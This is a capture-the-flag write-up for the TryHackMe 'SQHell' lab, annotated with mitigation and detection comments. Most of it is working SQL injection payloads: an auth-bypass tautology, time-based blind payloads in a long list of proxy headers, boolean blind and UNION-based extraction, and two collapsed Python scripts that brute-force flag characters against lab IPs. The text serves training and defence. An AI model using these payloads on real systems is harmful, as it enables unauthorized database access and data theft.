THM SQHell [TR][Manuel]

Flag-1:

-- Authentication-bypass payload and the query it produces once the raw input is concatenated into the SQL string.
-- The tautology `or 1=1` makes the WHERE clause true for every row, and the trailing `-- -` comments out the
-- `and password=''` check, so the login succeeds without a valid credential.
-- Mitigation: bind both values as parameters (`WHERE username = ? AND password = ?`); string concatenation is the
-- root cause. Comparing the password inside the query also suggests it is stored in clear text — if so, store a
-- salted hash and verify it in application code instead (assumption, not visible here).
' or 1=1-- -
select * from users where username='' or 1=1 -- -' and password='';

Flag-2:

X-Backend-Host: 127.0.0.1';select sleep(5);X-BlueCoat-Via: 127.0.0.1';select sleep(5);X-Cache-Info: 127.0.0.1';select sleep(5);X-Forward-For: 127.0.0.1';select sleep(5);X-Forwarded-By: 127.0.0.1';select sleep(5);X-Forwarded-For-Original: 127.0.0.1';select sleep(5);X-Forwarded-For: 127.0.0.1';select sleep(5);X-Forwarded-For: 127.0.0.1, 127.0.0.1, 127.0.0.1';select sleep(5);X-Forwarded-Server: 127.0.0.1';select sleep(5);X-Forwared-Host: 127.0.0.1';select sleep(5);X-From-IP: 127.0.0.1';select sleep(5);X-From: 127.0.0.1';select sleep(5);X-Gateway-Host: 127.0.0.1';select sleep(5);X-Host: 127.0.0.1';select sleep(5);X-Ip: 127.0.0.1';select sleep(5);X-Original-Host: 127.0.0.1';select sleep(5);X-Original-IP: 127.0.0.1';select sleep(5);X-Original-Remote-Addr: 127.0.0.1';select sleep(5);X-Original-Url: 127.0.0.1';select sleep(5);X-Originally-Forwarded-For: 127.0.0.1';select sleep(5);X-Originating-IP: 127.0.0.1';select sleep(5);X-ProxyMesh-IP: 127.0.0.1';select sleep(5);X-ProxyUser-IP: 127.0.0.1';select sleep(5);X-Real-IP: 127.0.0.1';select sleep(5);X-Remote-Addr: 127.0.0.1';select sleep(5);X-Remote-IP: 127.0.0.1';select sleep(5);X-True-Client-IP: 127.0.0.1';select sleep(5);
-- Time-based blind payload delivered in a client-address header (X-Forwarded-For in the script below): the
-- difference between a sleep(3) delay and a normal response is the oracle for one character of `flag`.
-- Mitigation: whatever statement records the client address must be parameterized — a header value is
-- attacker-controlled input like any other. Detection: `sleep(` / `SELECT` inside proxy-style headers and
-- response-time spikes concentrated on one source are high-signal log indicators.
' ;SELECT IF(SUBSTRING(flag,1,1)=CHAR(97),sleep(3),null) FROM flag;--+-
# Newlines were lost in extraction; this is a collapsed script, not runnable as one line.
# What it does: for each position `digit` it tries every byte in range(127) in the X-Forwarded-For header
# and treats a round trip of >= 3 s as a matching character. The 10.10.x.x addresses are the lab hosts
# from the writeup. Defender's view: this is one request per candidate byte per position, most of them
# delayed ~3 s, from a single client — visible in access logs by volume and latency. The fix is a
# parameterized statement for the stored client address, not filtering of header contents.
import requestsimport timeflag=""digit=1headers = {'Host': '10.10.92.166','Upgrade-Insecure-Requests': '1','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','Referer': 'http://10.10.32.43/','Accept-Encoding': 'gzip, deflate','Accept-Language': 'en-US,en;q=0.9','X-Forwarded-For': '127.0.0.1\' ;SELECT IF(SUBSTRING(flag,1,1)=CHAR(97),sleep(3),null) FROM flag;--+-','Connection': 'close',}while(True):for char in range(127):headers['X-Forwarded-For']=f'127.0.0.1\' ;SELECT IF(SUBSTRING(flag,{digit},1)=CHAR({char}),sleep(3),null) FROM flag;--+-'start_time=time.time()response = requests.get('http://10.10.92.166/', headers=headers)end_time=time.time()if(end_time-start_time>=3):flag+=chr(char)print(flag)breakdigit+=1

Flag-3:

-- Boolean-based blind payload against the username-availability check: the endpoint's JSON `available`
-- field flips depending on whether the guessed character of `flag` matches (see the loop below).
-- Mitigation: parameterize the lookup query. Also rate-limit and monitor the availability endpoint —
-- an unauthenticated true/false answer per request is exactly what makes this oracle cheap.
admin' and (SELECT SUBSTRING(flag,1,1)=CHAR(97) FROM flag) --+-
# Newlines were lost in extraction; this is a collapsed script, not runnable as one line.
# What it does: walks `flag` one position at a time, trying each byte in range(127) via the
# /register/user-check endpoint and reading the `available` JSON field as the oracle; stops at `}`.
# Defender's view: ~127 requests per character to a single endpoint from one client is a clear
# access-log pattern; the fix is a parameterized username lookup plus rate limiting on the check.
import requestsflag=""digit=1while(True):for char in range(127):url=f"http://10.10.41.105/register/user-check?username=admin' and (SELECT SUBSTRING(flag,{digit},1)=CHAR({char}) FROM flag)--+-"response = requests.get(url).json()['available']if not response:flag+=chr(char)print(flag)if(chr(char)=="}"):exit(f"[+]{flag}")breakdigit+=1

Flag-4:

-- Flag-4: UNION-based injection in an id-style parameter (`-1` empties the legitimate row set so only the
-- injected rows are rendered). The first two lines find the column count and enumerate tables through
-- information_schema. The last three select a second UNION payload as a string value; this looks like a
-- second-order injection — the reflected value is presumably concatenated into a later query (inferred
-- from the nested payloads, not shown here; confirm against the application).
-- Mitigation: parameterize the first query AND every query that reuses its output — stored data is not
-- trusted data. Run the application under a least-privilege database account so that schema enumeration
-- and reads of unrelated tables are not available to an injected statement.
-1 union select null,null,null--+-
-1 union select null,group_concat(table_name),null from information_schema.tables where table_schema=database()--+-
-1 union select "1 union select 11,22,33,44",null,null --+-
-1 union select "1 union select 11,group_concat(table_name),33,44 from information_schema.tables where table_schema=database()",null,null --+-
-1 union select "7 union select 11,flag,33,44 from flag",null,null from information_schema.tables where table_schema=database();-- -

Flag-5:

-- Flag-5: the standard UNION extraction chain — column count, table names, column names of `flag`, rows.
-- `group_concat(..., "\n")` packs many rows into the single cell the page displays.
-- Mitigation: parameterize the id input (an integer parameter should never reach the query as text).
-- Detection: `information_schema` and `union select` in request parameters are high-signal WAF/log indicators.
-1 union select 1,2,3,4-- -
-1 union select null,null,group_concat(table_name,"\n"),null from information_schema.tables where table_schema=database();-- -
-1 union select null,null,group_concat(column_name,"\n"),null from information_schema.columns where table_name='flag'-- -
-1 union select null,id,flag,null from flag-- -
